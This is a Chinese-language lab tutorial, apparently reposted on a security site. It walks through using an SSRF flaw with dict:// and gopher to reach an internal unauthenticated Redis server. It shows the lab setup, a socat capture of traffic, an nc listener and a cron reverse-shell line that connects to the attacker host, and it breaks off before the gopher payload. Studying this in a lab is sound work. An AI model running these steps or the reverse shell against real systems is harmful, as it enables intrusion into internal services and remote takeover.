网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

主页 > 业界资讯 > 网络渗透测试

ssrf漏洞(上) · Farmsec Open Source(4)

Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。

利用gopher协议getshell

使用ssrf漏洞结合gopher协议攻击内网redis

7.4.1 环境准备 redis未授权环境*2 #192.168.11.203(真实机) 192.168.11.192(模拟机) ssrf漏洞环境(跳板机) #192.168.11.135 kali攻击机 #192.168.10.96

redis在内网(开防火墙仅允许ssrf机器访问),kali无法直接访问redis,只能通过ssrf作为跳板机攻击redis。

image-20220407194106998

环境验证:

1)redis测试机(192.168.11.192)kail攻击机可以访问

image-20220408110656671

2)内网redis真实机(192.168.11.203)不可以访问

image-20220408110728126

3)内网攻击机(192.168.11.203)设置

firewall-cmd --add-rich-rule='rule family=ipv4 source address=192.168.11.135 port port=6379 protocol=tcp accept' firewall-cmd --list-all

image-20220408111156265

4)内网攻击机(192.168.11.203)仅可以被ssrf漏洞主机(192.168.11.135)探测到

image-20220408111016128

实验流程

探测内网发现存在redis主机,推测可能存在未授权漏洞,但kali无法直接尝试,故在本地搭建redis测试环境,抓到攻击流量后转换为gophper通过ssrf服务器传递给内网redis主机 7.4.2 ssrf探测redis服务

通过探测发现,内网192.168.11.203开放6379端口,6379为redis默认端口

?url=dict://192.168.11.203:6379

image-20220407213829030

7.4.3 kali攻击机安装redis连接工具 apt-get install redis-tools 7.4.4 开启流量转发

kali启动流量转发工具socat,目的是抓取到相关的流量内容

192.168.11.192为测试主机

socat -v tcp-listen:6379,fork tcp-connect:192.168.11.192:6379

image-20220408104029258

7.4.5 kali开启nc监听

攻击redis会写入计划任务,计划任务内容如下,因为是反弹且时间为每分钟故须提前开启监听

bash -i >&/dev/tcp/192.168.10.96/3333 0>&1

另开一终端,启动监听:

nc -lvp 3333

image-20220408103944960

7.4.6 模拟攻击redis (责任编辑:admin)